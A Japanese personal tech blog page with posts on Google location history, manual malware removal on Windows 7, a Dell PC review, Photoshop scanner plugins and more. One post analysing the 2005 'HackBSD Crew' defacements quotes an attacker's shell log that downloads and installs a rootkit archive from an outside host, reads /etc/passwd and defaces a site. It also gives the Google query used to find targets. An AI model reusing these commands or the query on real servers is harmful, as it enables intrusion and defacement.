カテゴリー「パソコン・インターネット」の投稿

2017.05.06

googleが自動収集している自分の行動履歴&GPS位置

こんなにいつの間に収集しとるとは・・・

http://b.hatena.ne.jp/entry/www.orefolder.net/blog/2017/05/google-map-photo-upload/
はてなブックマーク - 撮影した写真が勝手にGoogleマップに投稿される? 確認すべき設定と通知オフの方法
 
上記のようなエントリが2017年5月7日ごろに多数発生しており、
googleMAPに自分のスマホ写真が投稿、もしくは他人共有状態になっているので旅行写真撮っていた人は注意、
という話です。
自分はスマホで滅多に写真は撮らないので・・・と念の為にgoogleアカウントにログインしてみたら、
写真はアップロードされてはいませんでしたが日々の行動記録が全部記録されてました。
移動ルート履歴とか、スマホでのアプリ起動履歴とか、PCでのChromeやYouTubeの履歴とか
「アクティビティ」「タイムライン」「ロケーション履歴」とか呼ぶらしいです。
スマホでgoogleアカウントを作ったときに、こうした履歴の許可を認めていたのでしょうね、ちゃんと設定の全項目を見ていなかった(汗。
スマホで『google>設定>プライバシー』を見てみると、確かに「YouTube履歴を記録する」とかONになってますな(汗
商業施設に行ったときに「チェックインしましょう/他の人のここでの投稿写真がある」とか
GPSが便利だからONにしてるといろいろ言ってきたが、私の施設訪問がgoogleMAPに座標投稿されていた!?
私はグーグルマップに写真の投稿はなかったけど、ピンがマークされていた・・・
そんなの許可したつもりなかったのに。
しかし「行動履歴をトレースする」をスマホで許していたので、なんと私の毎日の行動移動がGPS軌跡としてgoogleMAPに残るんですね。びっくり。
勝手に共有はされていないのだけど、まさか毎日の行動がMAPで線で辿れるとは。

まぁおもしろいけど、余計なおせっかいだなぁ。
MAPで現在地をGPSでリアルタイムで示してくれるだけでいいのに。
さらにおせっかいなことに、訪問先がお店だとランドマーク来店として記録され、「貴方の良く行く場所ベスト○○」
というランキングまで表示するのかよ>MAP
余計だけど、すごい(笑)。
ちなみに、私は外食ばかりなので、松屋とかかつやとかやよい軒とか飲食店が上位になってました(笑)

で、これら履歴は全部消しました。
ブラウザの検索履歴をいちいち記録せんでええし(汗
私が日にツムツム起動してる回数も数えなくていいから。
スマホはXperiaなので、SONY純正の行動履歴アプリ「LIFELOG」で記録してるので、googleは要らない。
(スマホゲーやりすぎてるので、日に何時間プレイしているか見るために記録)

20170506


| | トラックバック (0)

2014.03.22

windows7に変なファイルが入り込んでいたので駆除

自分備忘録対処記録メモ。
今日、久しぶりにタスクマネージャを見たら「jubyfa.exe」というプロセスが常駐している??
スタートメニューに居ないし、サービスにも居ないし、レジストリRUN(HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run)にも居ない。
どこから侵入??
毎日ネットをうろついていたから?しかしブラウザ閲覧だけで何かインストールなんて...
しかし今回は史上最悪にやっかいでした。

(2014年5月追記)
■今度はkxhppo.datが入り込んできた?
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
「regsvr32.exe "C:\ProgramData\kxhppo.dat"」
msconfigで見ると、バイナリ提供者はマイクロソフトとあるが、こんな変な場所にdat置かない。
入りこんだ日付ではChromeをインストールしていたんだが....
検索してもこんなファイルの話題はどこにも無いし、
Chrome入れた後で、あちこちWEBサーフィンしたときに変なの踏んだのか?
でもブラウジングしただけで、\ProgramDataにファイル置けないよなぁ。
うーん、またも侵入を許してしまった。
最近IE10で正常に表示できないサイトが増えたので、サーバ障害か?と思っていたけど
他の利用者はサーバにクレームの書き込みしてないし。
なのでChromeを入れたのでした。それだと正常に表示される!!
IE10はオワコンらしい。

(2014年3月)
■消せないファイルの特徴
・実体は「C:\Users\win7\AppData\Local\Temp」自分のプロファイルのtempに居た
・実行コマンドはローカルマシン\runじゃなくユーザ\runに潜伏してた
*ファイルが削除できない!!ファイル所有者(今回の場合win7という名前)なのに
 「win7のアクセス権が必要です」エラーで削除や改名ができない。私がwin7なのに??
・ファイルの移動はできる。移動先でも削除できない。
・ファイルをコピーするとエラーが出るが0バイトのファイルで複製され「それも削除できない!」
・Microsoftエッセンシャルでexeをスキャンさせると「できません」エラー!?
 スキャンできないってどういうこと?
削除できない侵入ファイル

■削除の道程
ネットで検索すると「所有者を自分すればいい」ばかりの回答で、ファイルの所有者は最初から自分(今回場合はwin7という)になってる。これをいじろうとすると「win7の許可が必要」とエラーしやがる!?
adminとかguestとかeveryoneとかにファイル所有者を変えても「win7の許可が」と変わらないのがオカシイ。
win7はadminグループなので所有者を変更できたしフルコントールアクセス権あるのに、自分のモノを自分で始末できない??

封印していたadministratorユーザを登録して(win7では隠されているので、コンピュータの管理から封印解除)、
adminでログインして削除をするもやはりNG。管理者でさえ削除できない??
F8ファンクション起動で、セーフモード配下でやってもやはりダメ。

ツールで「DelFile」「unlocker」試すも削除できなかった。

常に「所有者の許可がー」と言うので、コマンドラインでオーナーを強制変更してみる。
pathの短い場所に移動させてからテスト。

C:\Ehm>takeown /f *.exe   (/aが無いのでログインユーザ(win7)に所有権移る)
成功: ファイル (またはフォルダー): "jubyfa.exe" は現在ユーザー "win7-PC\win7" に
よって所有されています。
C:\Ehm>del jubyfa.exe
C:\Ehm\jubyfa.exe アクセスが拒否されました。

C:\Ehm>takeown /f *.exe /a   (/aでadminグループに書き換え)
成功: ファイル (またはフォルダー): "jubyfa.exe" は現在 Administrators グループに
よって所有されています。

C:\Ehm>del jubyfa.exe
C:\Ehm\jubyfa.exe アクセスが拒否されました。

C:\Ehm>dir *.exe
2010/06/25 12:15 422,400 jubyfa.exe

2010年とかファイル名「jubyfa」は偽装だろうけど、
コマンド使うと所有者は変えることには成功したが、
結局「Administrators グループの許可が必要」と変わっただけで削除はできない。
win7だってadminグループなのに。

■で、結局OSを変えて削除に成功
最後の手段で、HDDからbootしてるWindows配下ではどうしようもないので、
別のOSをDVDからbootして、そのOSに削除をやらせようと考えた。
windows8だと下位互換でご丁寧に7のアクセス権を尊重するかもしれなかったので、
古いvistaを使うことにした。
しかし、
インストールを途中で中断させてコマンドプロンプトを出させたかったのだが、方法判らず。
仕方ないので、ドライバ追加読み込みのボタンを押して
ファイル選択ダイアログウインドウを出させることに成功、そのダイアログで
問題のファイルのあるフォルダに行き、マウス右クリックでフォルダ削除に成功!!

Windowsって、システム属性かなにか知らないが、admin権限でも削除できないファイルあるよね...
今回の変なファイルもそういう特殊属性を付加してたのだろうか。


■もうひとつ侵入していた謎ファイル

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
ここで別の侵入者を発見したのだが、「regsvr32.exe "c:\programdata\gluzrhny.dat"」
他にもjneaxnoy.datとかqjncfkzu.datとか、暗号な命名。
msconfigで見るとファイル作成microsoft社でOS由来だとシグネチャあるが、
こんな場所にこんな名前で常駐させるか? ネットで検索しても何も出ない。
誰も困ってないのか? 逆に公式でないファイルなんだろうと判断。
regsrv使っているなんて怖い。日付見ると今週に侵入してる。
何かやったっけなぁぁ??
とにかく怪しいので削除。特にファイルプロテクトはなかったので削除は成功。

■スタートアップ侵入手口・その他
他の事例だと、ここに仕込んでくる奴も居ましたね
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run


海外の怪しいサイトや怪しいフリーウェアを漁るのは危険ですね。
たまに、タスクプロセスと\runをチェックする私は気付けて、増えているものもわかって
削除すべきか判断できますが、
PCに詳しくない人は、変なのが常駐しても気付かないでしょうし、
先のような削除できないのなんか、私だって怖かったです。
ネットでjubyfa.exeでは全くヒットしなかったので、いったい何者だったのやら。
しかし今回、「強制削除できるフリーソフト」とか藁にもすがる思いで試用したので、
感染侵入に結局セキュリティ充分でないですね私は(汗

まぁ、みなさんもたまにはPCの中を監査してみましょう...ってことで。
にしても、久しぶりのブログでした。
公私ともども忙しく、ネットは読むけど書き込む時間がなかなかとれません...
書きたい話題はたくさんあるのですが。

| | コメント (1)

2011.08.07

DELL XPS8300買いました

■最低でも9万円するがスペックも高いので割に合うコストパフォーマンス

2011年7月にXPS8300買いました。デルは会社でも自宅でも何度も買っているメーカーです。
BTOがシンプルで、余計なものが搭載されてないし、国内メーカより安い。

■出荷準備中...

欠点第一は海外製造で納品に時間かかることか。今回も二週間かかりました。
日本到着まで4日間で早い!と今回期待するも税関で長く停滞しました。
あのオーダーステータス本当の状況表しているのか?
蕎麦屋の「いま出前出ましたー」と嘘いってるみたいな?(笑)
2ちゃんねるには、オーダーステータスを見守るスレッドもあるのか。

■ミドルタワーで重くない

去年にツクモでエアロスリム買ったのですが、それよりは重いですが
フルタワー防振型よりは小さくて軽い。それで拡張性もある。
写真とかは公式や各所レビューに詳しいので譲りますが
S-ATA4本丁度の拡張性があっていい。エアロスリムは拡張性が無いし、
前のantecのフルタワーはたくさん内蔵増設できるが実際たくさんは要らなかったし、
電源分岐延長でケーブル配線がわずらわしかった。
XPSは最初から4本ぶんの電源ケーブルがありますので、SATAだけ買ってくればいい。

■フロントとトップのデザインが凝ってる

フロント中央はスライドして降りて開くギミック。
フロント上部のブルーレイはパネルにバネがあってトレイがそれを押しのけて開く。
全体的に角張ってなくてトップの凹みはやはりいいかも。
一番いいのは、USBケーブルが常時通電してること。パソコンをシャットダウンしても
USBでiPhoneやPSPや携帯電話を充電できる。

■価格は安くできないBTO

XPS8300の欠点は、カスタマイズがあまりできない。
7月に買った時分には、CPU変えられないし、8GBメモリが最低。
8ギガも要らないのだがそれ以下が選べない。ブルーレイとビデオカードへアップグレードしてベース8万円から11万円。
ところが今DELLのサイト見たら(2011/8/8)、メモリが最低でも12ギガから??
それで同じ価格帯だから円高還元なんですかね?しかし12GBもどうするんだよ。
スペック下げて値段をさげずに上乗せして価格を維持してやがる。
まぁ損ではないのですがねぇ。
これなら秋葉原のショップ白箱で4GBぐらいの規模のを選んだほうが安くていいかも。
秋葉原も今はメモリあたりが値下がってますね。

■3台目のHDDは5インチベイ

シャドウベイが2台までなので、プライマリセカンダリを取り付けたら
三台目は5インチベイへ。マウンタでゲタ履かせましたが、筐体のフロントのマスクパネル、金属板なんですが固くて切り取りにくかった。
普通はプラモデルのランナーのようにすごく細くつながっているのでぶちっと切れるのですが
XPSのはそれが太くて切り取りが大変でした。
説明書ではドライバーを差し込んでねじれば外れるとあったが嘘だ...
DELL-XPS8300
5インチベイは2つあるんですが、右側2本がネジ止めが不要。左二本だけで止めるデザイン。
両面からネジ締めなくてラクではあるのですが、省略していいんかな...
HDDシャドウベイは籠型で取り外せるのですが、
他のカゴだとHDD二個を取り付けてから筐体に...という仕組みなんですが
こいつは1個だけ。まぁこれもマニュアルを良く見て構造予習しましょう。
...とまぁ筐体がちょっとマニアックな造りになってますね。
事前にWEBのDELLサポートでマニュアルを読むと吉。
(フロント外装パネルの外し方とか予習しておかないと、プラスチックなので爪とか誤って折るかも)
配送物には紙のマニュアルはありませんので注意。CDROM。

SATAは4ポートあって、1番2番が6Gbps対応らしい。
HDDが6G対応や高速転送ならそこに繋ぎたいところ。
3TBな新しいデバイスもちゃんと認識できました。
(去年買ったエアロwin7-64bitにも外付けで3TBは自動認識できました。
 よほど古い機体でなければ大丈夫かな)

CPUは8スレッドだし(4コア×HTテクノロジー)
余ったメモリはRAMディスクにすればなかなかパワフルです>XPS8300
DELLのこれより上位でなく、この基本モデルでも十分使えそうです。

|

2011.08.06

windows7とPhotoshop Elements 9とEPSON Scan

windowsアプリケーションの小話いろいろ

■XP専用?MS純正ロゴスクリーンセーバー

昔、winNTにあったpipeってスクリーンセーバが好きでした。パイプ配管をひたすら3D描画するやつ。
エルボ(配管曲がるところ)をランダムに設定すると稀に「ポット」のオブジェクトが出現するというイースターエッグの仕掛けがありましたっけ。
今でも職場ではXPがメインOSなのですが、何かセーバがないか探したら
マイクロソフト純正で3Dでロゴがはためくのがありました。
http://www.microsoft.com/windowsxp/downloads/desktop/xpscreensaver.mspx
ハードウェアアクセラレータ機能が弱いと表示ちょい厳しいくらいに大きくウネウネとうごめきます。
ご丁寧にOSチェックをしててwin2003serverR2では動作せず。
でも、XP互換モードにすれば動かせた。
xpscreensaver


■エプソンスキャナとフォトショップが連携しない不便

VISTAでElements旧版が動作不良で画面描画が崩れるし、上部メニューが横一列で
私のモニタの1280ドットだと尺が足りなくてメニューが見切れるとか使い勝手最悪だったので
仕方なく最新のElements 9にアップグレードしました。
ウインドウ拡縮がやっとまともにできるし、メニューも二段表示になった。
ところが、9になると今まで使えていたEPSON Scan(エプソンのスキャナ装置の読み込みユーティリティ)との連携ができなくなった。
9の読み込みメニューにEPSON機器が出てこない。EPSON Scanをインストールしても。
ちゃんとエプソンの側は64bit版だし7対応とあるのに??

エプソンのFAQで以下を見つける。
http://faq.epson.jp/faq/00/app/servlet/qadoc?030792
Q:
Adobe Photoshop CS4/CS5からスキャンしたいのですが、メニューにスキャナーの機種名が表示されません
A:
Adobe Photoshopからスキャンするためには、スキャナードライバーの他にTWAINプラグインが必要になります。TWAINプラグインをインストールするか、EPSON Scanでスキャンした画像をファイルに保存してから、Photoshopで開いてください。

TWAINプラグインを入れるってのが具体的にどうすればいいか不明で、
結局上にあるように「EPSON Scanでスキャンした画像をユーティリティ単体でファイル保存して、そのあとでフォトショに読み込み」って運用してました。
めんどくさい!!
フォトショから読込を起動するとOS汎用のスキャナアプリが起動し、それでスキャンはできる。
でもEPSON Scanが持っている非常に細かな設定変更が使えないのが不便。
雑誌印刷のモアレ低減とかホコリ取りとか色調変更とかトリミングとか。

最新版フォトショで逆に不便なのはあまりに理不尽なので調べたら、
9発売後アドビにFAQが追加されたようです。なんだかなあ。
http://kb2.adobe.com/jp/cps/872/cpsid_87214.html
Q:
Adobe Photoshop Elements 9 でスキャナーなどの TWAIN 互換機器が使用できません。Photoshop Elements 8 および以前のバージョンでは使用できました。
A:
Photoshop Elements 9 の初期設定では、TWAIN プラグインは無効にされています。
この問題を解決するには、TWAIN プラグインを有効化します。

重要:以前のバージョンでインストールされた TWAIN プラグインを Photoshop Elements 9 の「Plug-Ins」フォルダーにコピーして使用したり、[プラグイン] 環境設定で Photoshop Elements 8 またはそれ以前のバージョンの「Plug-Ins」フォルダーを追加のプラグインフォルダーとして設定し、使用することはできませんのでご注意ください。
注意:Windows で使用するスキャナーが Windows Image Acquisition(WIA)ドライバーをサポートしている場合、WIA ドライバーを使用して Photoshop Elements からスキャンすることを推奨します。WIA ドライバーがサポートされていない場合は、スキャナーの TWAIN ドライバーを最新のバージョンにアップデートします。これらの操作に関する詳細は、スキャナーに付属のマニュアルを参照するか、スキャナーの製造元にお問い合わせください。

1.Photoshop Elements を終了します。
2.フォルダーを開きます。
C:\Program Files\Adobe\Photoshop Elements 9\Optional Plug-Ins\Import-Export
3.「Twain_32.8BA」(Windows)ファイルをコピーします。
4.コピーしたプラグインファイルをペーストします。
C:\Program Files\Adobe\Photoshop Elements 9\Locales\ja_JP\Plug-Ins\Import-Export
5.Photoshop Elements を起動します。

これで9のメニューにエプソンの機番が表示されるようになりました。
これで起動するとEPSON純正のユーティリティが起動してスキャンするとそのままフォトショに転送されます。
わざわざ無効化していたとは。
私のスキャナもGT-9400UFで2003年製で古くなった。しかし3200dpi解像度は十分すぎる。
普通は300dpiもあれば印刷物は綺麗に読めるから。買い替える理由がない...
最新機種だとスキャン時の音が静かになってるのかな...
CCDは筐体が分厚いですが、CMOSは読み取りピント深度や鮮明さでダメでしたが、
今のCMOSは性能いいのかなあ。CCDでかいんですよね、AC電源が必要だし、
USBケーブルだけってのは手軽でよかったなあ。


■WesternDigitalの2TBと3TBのHDD

2TBは2009年登場当時は35000円
http://pc.nikkeibp.co.jp/article/news/20090227/1012724/
登場当時はどんだけプラッタに密に詰め込んでいるんだよ!と思いましたが、
2011年の現在では普通に買えるシロモノになりましたね。
私は2010年に2TBをツクモで買いました。
そして今年に3TBもツクモで買いました。9500円くらい。WESTERN DIGITAL WD30EZRX
保証とか付加して+500円出せば1万円超えるので
つくもたん紙袋をもらえたのに。あとでHDDマウンタ(5インチベイ用)買ったのですが一緒に買えばよかった。
仕方ないね。

2011年8月情報。パナソニックのBDメディア買うとつくもたんポスターとかもらえるらしい。
http://akiba-pc.watch.impress.co.jp/hotline/20110806/price.html
1万円よりハードル低くていい。同じページに窓辺ななみの新作夏イラストも登場との紹介もあり。

3TBのときは紙箱に入ってました。帯電防止ビニールの外箱。
一般的にそういうコスト手間はかけない業界だったのに。
一枚紙なので耐衝撃性あるダンボールとかではないです。
回転数は噂では5400rpmぐらいで低速だとされてますが、スペックでは6Gbps転送対応とある。6Gなマザボだと高速になるのかな?
DELL XPS8300買ってるのですがベンチマークしてないです。
でも大容量のは「触って熱い!」と思っていたので発熱抑止での低速回転はいいと思います。
でもWDの2TBも結構熱くなる。3TBは内蔵しちゃって触ってなく未確認。
とにかくコストパフォーマーンス的にWDはいいと思います。

|

2011.07.12

『HackBSD Crew』とPHPやwebdav脆弱性と帆場暎一

(2011.7.12追記)
先日のニュースで、ソフバンの通信網がバグでなく意図的に異常動作して犯人逮捕のニュース、
すぐに発動せずに、犯人が会社を離れてからなんて、
機動警察パトレイバー劇場版1の帆場暎一を思い出したのですが、
http://temple-knights.com/archives/2011/07/softbank-network-down-Inside-job.html
やはり皆さんもそうでしたか(笑)。
しかし、プログラムの無謬性は、どのように保証担保されるのか?
複雑で高度なシステムになると、レビューや監査や検収でバグすら見逃すのに、恣意的に組み込まれ意識して隠蔽されてるウイルスなロジックを防げるだろうか。
作る奴のほうが検収する側よりプログラミング優秀だから作っているわけで。
そういうのを防ぐためにオープンソースがありますが、REDHATのように自力コンパイルが面倒でバイナリを買うような時代ですし、
膨大なLinuxの全ソースを監視できているのかな?>リーナス・トーバルズさん
OSSに対して、帆場なら元ソースにはウイルスを表示させないで、コンパイラリンカを便利に見せかけてシェアを獲得し、そこにウイルス仕込んでたりしそう。


(2005/10/17)
■Windows版HackBSDだとphpは関係無い?

2005年8月23日から数日間に国内で集中発生した「hackbsd crew」は8割方が「windows2000&IIS5」という組み合わせでした。
改竄情報サイトにもphpが動作してたとは記載がない。
そこでこのバージョンの組み合わせならば、win版hackbsd改竄はマイクロソフトのwebdavの脆弱性を突かれている可能性があります。特に2K&IIS5はやばかったですし。(2003年には既知な脆弱性だった)
win版『HackBSD Crew侵入』はこういうところを突かれたのかも。
WEBDAV自体は拡張httpなのでUNIXでも組み込まれているでしょうが、UNIXならPHP経路侵入なのでしょうか。
被害にあったところから伺った、webDAVを突いて侵入する手口は、
・侵入者のクライアントがUNIXコマンドライン型WebDAVクライアントcadaver/Neonを名乗っている
 (UAにcadaver/Neonと表示されている)
・webDAVをサーバで有効にしているぐらいの無防備IISだと、書込もeveryone属性になっているだろうから、OSの権限を乗っ取らずともリモートからIISでファイルをputしてしまうらしい。
というわけで、この場合は侵入原因としてPHPは関係ないことになります。
まぁ、まともな?クラックツールならあらゆる脆弱性を試す仕掛けになっているでしょうから、Windowsへの侵入にはwebDAVでない方法も悪用されることでしょう。
いずれにしても、新たな脆弱性を突いたわけではなく、2003年あたりから既に知られている手法で今なお侵入されている場合がほとんどのようです>サーバ書き換え事件


(2005/8/30追加)
情報元サイトのドイツ語訳をコメントにいただきました。ありがとうございます。
しかし現在も相変わらず改竄されている国内の半分はwin版ですが、こっちはどういう被害(書き換え&削除)なのでしょう。
世間的にニュースにならないからこのまま淡々と?さみだれ的に改竄され、各所で慌てて個別対処な流れなのでしょうか。


(元本文)
2005/8/23あたりに国内で多く被害が出ているので情報まとめ。
Windows系セキュリティアラートだとネットニュースや総務省から全国への注意喚起も(マイクロソフトの代理店か?と思えるくらいに)行われていますが、PHPのこうした情報はどこにアナウンスされているのだろう?
見つけきれずに自分で集めたので折角だから記録。

■トラブル事象
WEBサーバがリモートからクラックされ、html改ざんや内部ファイルの削除をされてしまう。

■トラブル詳細

日本での初出は2004年から既にあったようですが
www.zone-h.org
2005/8/23に特に多発したサーバ改ざんが『HackBSD Crew 0wnz You @ [g0d]』。
これはHackBSDとしてのcrew以外にも亜種があります。サーバの乗っ取りに成功すると、
WWWルートディレクトリ直下に「/hackbsd.html」という犯行声明を残していく。
文面は、以下のようなもの。

 HackBSD Crew 0wnz You @ [g0d]
 Whe are not Criminals, Looking for one?, Go to the white house!
 eu.undernet.org #hackbsd
 Whe are: EL_S0MBRA,dope|man,bebo,jsz,jank0,[g0d],RockyCroW

■攻撃の手口

これがなかなか情報が見つからない。
検索でもHACKBSDにクラックされたサーバを単に晒す情報しか見当たらず。
情報の元をたどって、サイトを見つけました。
どうもここが詳細に症状をレポートしてるらしいのですが、ドイツ語なので読めない…
http://haftbar.de/2005/08/11/hackbsd-crew-0wnz-y0u-jank0

■攻撃を受けるソフトウェア?
Serendipity Weblog (serendipity_xmlrpc.php)
Drupal (xmlrpc.php)
TikiWiki (xmlrpc.php)
phpMyFAQ (xmlrpcs.php)
Wordpress < 1.5
phpAdsNew
eGroupware (not yet verified)
phpGroupware (not yet verified)

■攻撃を受けたときの(関係するらしい)httpログ
230.xx - - [09/Aug/2005:19:52:41 +0200]
 "POST /xmlrpc.php HTTP/1.0" 200 524 "-" "-"
200.88.29.xx - - [10/Aug/2005:04:15:35 +0200]
 "GET /~manaus/wp-login.php HTTP/1.1" 200 1339 "http://www.google.com.do/search?q=allinurl%3A+%2Fwp-login.php+site%3Ade&hl=es" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:36 +0200]
 "GET /~manaus/wp-admin/wp-admin.css HTTP/1.1" 200 6074 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:38 +0200]
 "GET /~manaus/wp-images/wp-small.png HTTP/1.1" 200 1416 "http://haftbar.de/~manaus/wp-login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
200.88.29.xx - - [10/Aug/2005:04:15:43 +0200]
 "GET /~manaus/xmlrpc.php HTTP/1.1" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
218.234.2.xx - - [10/Aug/2005:04:16:00 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 139 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:06 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 113 "-" "-"
218.234.2.xx - - [10/Aug/2005:04:16:24 +0200]
 "POST /~manaus/xmlrpc.php HTTP/1.1" 200 76 "-" "-"

■侵入突破されたあとのtelnetログ
wget freewebs.com/REMOVED/shv4.tar.gz
tar -zxvf shv4.tar.gz
cd shv4;./setup 0ri0n 6000
cat /etc/passwd
passwd postgres
cd /home/manaus/public_html;ls
rm xml*
cd /var/www;ls
cd haftbar.de;ls
cd htdocs;ls
echo hackbsd Crew 0wnz y0u! @ jank0 >index.php;
rm xm*
cd /tmp;
rm *.txt killall -9 r0nin.txt

以上を自己勝手に解釈させて書かせていただきますと↓下のような流れ

■PHPが稼動しているサーバが狙われる。
国内セキュリティ監視ニュースサイト↓
JPドメインWeb改竄速報 http://izumino.jp/Security/def_jp.html
これらの改ざんでの共通点は、
Microsoft-IIS/5.0&Windows2000、または、Apache/1.3.31 PHP/4.3.8 Linux
OSよりもPHPであるかどうかが重要?

■PHPが稼動しているかのping-aliveのため「wp-login.php」を手がかりにしている
今年2005年5月の価格.comの騒動ではSQLインジェクションが話題でしたが、あの時それよりも多く被害が出ていたのはphpBBの脆弱性を突かれたサーバ改ざんでした。
その時の手口が『PHPサーバを探すためにgoogleを利用し、Powered by phpBB Version…の文字列を含むサイトを探してから攻撃に入る』というものでした。
(これは既に去年の段階で、Googleを利用し.ASP .JSP .PHP .PHTM .SHTMあたりを探し回る手口のワームがあったようです)
これと同じように、今回は、
http://www.google.co.jp/search?complete=1&hl=ja&c2coff=1&q=allinurl%3A%2Fwp-login.php+site%3Ajp&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
このように「allinurl:/wp-login.php site:jp」で目星をつけていたようです。

■httpポート経由でPOSTやGETをPHPに仕掛けてクラックする?
サーバを見つけるとPHPへリクエスト攻撃するわけですが、
なぜここでOSの管理者権限が乗っ取られるかが不明です。
HackBSDを名乗る手口自体は2004.12時点で既出ですが、今回が同じ痕跡名でも侵入手法が同一かは断言できません。
単に未パッチ放置だったサイトばかりであれば手法は古典的なままなのかもしれませんし、乗っ取り部分だけ新型なのかもしれませんし。

■乗っ取られたあとは…いろいろやられ放題?
もっとひどい悪さをできそうですが『HackBSD Crew』では犯行声明ページで
『Whe are not Criminals』と主張してます。が、
それと並行して、UNIX系の場合は、
一部のファイルのremove、passwdファイルの書き換え、freewebs.com/REMOVED/shv4.tar.gzをダウンロードしてそれのsetupをやってるようです。
(shv4.tar.gzはかなり古いexploitsのアーカイブでアングラにごろごろあるクラックツール)
あとwin2k+IISの環境でも侵入されています。こっちもコマンドラインとかバッチで自動的にサーバ内を好き勝手しているのでしょうが、UNIXのhisのようにコマンド履歴が残っているかどうかが怪しい(IISでやられた事例ログを収集中ですが見当たらず)。それに痕跡をも削除するマクロなのがデフォでしょうし。
そのため手掛かりが少なく手口解明がより難しいかもしれません>win版PHPの場合。
shv4.tar.gzがwinでは動きませんから別の何かを仕掛ける手口かもしれませんし。

■echoでhackbsd声明文ファイルをサイトに蔵置する
「ファイルの蔵置」は公用な表現ですが、これによりやられたことが判るわけです。
改竄サイトを検出している所はよくまぁ見つけますね??

■ドイツのそのレポサイトによればバックドアも仕掛ける?
「telnet backdoor port 1666」ともあります。

今回の攻撃も既知の脆弱性を相変わらず突いたものであるならば、
ネットには無防備&放置なサーバがまだまだ多いということでしょうか。
先のgoogle検索では300件ぐらいヒットしますので、まだまだ攻撃は続くかも?
(2011年に検索してもまだヒットする...この中に相変わらず無防備な作りのがあるのか)
とりあえず過去(2004年)の乗っ取り手法を調べたのですが、検索してみて日経BPに技術的な手口解説の記事がありました。
(引用元は英語ばかりで国内から発信されてないようです)
この時のPhpInclude.Worm(Santy.e)というワームはPHPの関数「Include()」や「Require()」を不適切に使うことで発生する「File Inclusion Flaw」現象を悪用する。よってセキュリティホールというよりSQLインジェクションのようにプログラム設定ミスを突いたものでした。よって広範囲のPHPが該当したそうです。
PHPを狙うワームが出現,Webページのプログラム・ミスを突く 2004.12
記事にあるようにすぐ亜種が出現し、セキュリティホールも攻撃する複合タイプも出現しているため、最新のセキュアな状態に維持し続けることが肝要と思われます。

アドバイザリで2004年12月のPHP脆弱性解説を見つけましたが、英文です。
http://secunia.com/advisories/13481/
その後はPHPに関しては2005年4月にDoSを受ける脆弱性が報告されてますが、
現在は特に何もアドバイザリは出ていません。>PHP
となると、一番のhackBSDの原因は新手の攻撃でなく、この2004年12月の脆弱性が残っているに過ぎない?

| | コメント (2) | トラックバック (1)

2011.05.09

ニフティ25周年、googleボタン効かないとかパソコン関連

ニフティは、今年になってTimeLineブログサービスの終了を発表してましたが、
次はビデオ共有も終了との案内も。縮退していますなぁ、ニフティ

■「NIFTY-Serve」へGO ニフティ25周年サイト、パソコン通信体験も
http://www.itmedia.co.jp/news/articles/1104/15/news050.html
往年の栄光を懐かしむ企画。昔はニフティにあらずんばネット人にあらずみたいな勢いがあったもの
です(遠い目)。
その人に連絡したいから入会した、という流れ。
同じことはmixi、今ではtwitterですね。私の入会動機はそういうところにあり。
体験サイトでコマンドラインを懐かしく操作しましたが、実際の電子フォーラムを閲覧できないので、あまり巡回できなかった。
CBと入力してシチズンバンドぐらい行かないと。GOコマンドもあまりバリエーションないし。
ニフティからISP解約してアカウントだけ残している感じです。今はOCNでプロバイダ契約中。
ニフティは定期報道発表で会員数の発表をしなくなった時期から減少に転じていたんでしょうなぁ。
ブロードバンド&インターネットな時代の波に乗れなかった。
とはいえ他社のどっかがISPで独り勝ちしてるわけでもないが、ニフティが提供してた、ホームページサービスでは20MBしかないし、メール容量や添付最大サイズを拡張したのは後だし、ココログのtypePadはブログの中で一番操作が面倒で応答遅いし、今回のようにサービス作るも不人気だし、でいいところが無い。
顧客離れに、何もしなかったわけではないがすることやることに魅力的さが欠けている。
私は長年利用してきたので、このまま長く続けたいところですが...


■google検索ボタンが無反応になる症状について
http://www.google.com/support/forum/p/websearch/thread?tid=6056a061cd935e63
2011/04/25
googeのトップから文字列を入力して検索ボタンを押すと結果が出てきますよね
一回目の結果が出てから再検索をしようと検索ボタンをクリックしても反応しないため検索が出来ません。
テキストボックスの下に表示された検索候補を選択しても検索されません。
この症状が出ると、Enterキーを押しても反応がありません。
再度トップ画面にするかアドレスバーを使えば検索は出来ますが…
尚、IE8でも同様の症状が発生しています。
使用環境 XPSP3 Chromeの最新版(10.0.648.205) Internet Explorer8

私も検索ボタンがgoogleで反応しなくなって4月は困っていました。
それで上記の報告にたどり着いて、対策として「googleアカウントをいったんログアウトして再ログイン」で直せました。
利用者数多いのでもっと騒ぎになってもよさそうなのですが、ログインしてる人は少ないのかな。


■ダイヤテック、キー前面に刻印を施したキーボード
http://pc.watch.impress.co.jp/docs/news/20110427_442678.html
ダイヤテック株式会社は、キーの前面に刻印を施したFILCOブランドのキーボード「Majestouch BLACK(マジェスタッチ ブラック)」を5月12日に発売する。価格はオープンプライスで、店頭予想価格はフルキータイプが12,800円前後、テンキーレスタイプが11,800円前後の見込み。
キーキャップの刻印をトップではなく、手前側面に施すことで、上部から見て無刻印キーボードのように見えるデザインとした。LEDインジケータ部の印字も省いた。印字部分が直接に触れることがなく、指の摩擦による印字薄れや剥離の問題を解消するという。「タッチタイピングに自信がある方や、無刻印キーボードは格好良いけどハードルが高いと思っている、ミドルクラス以上のユーザーに最適な製品」としている。

製品ラッシュなPCパーツななかで、最近気になったのはこれ。
「無刻印はカッコイイけどー何も無いと分からないんだよねー」なカッコつけな自分にドンピシャ。
しかもHHKとかより安いし。
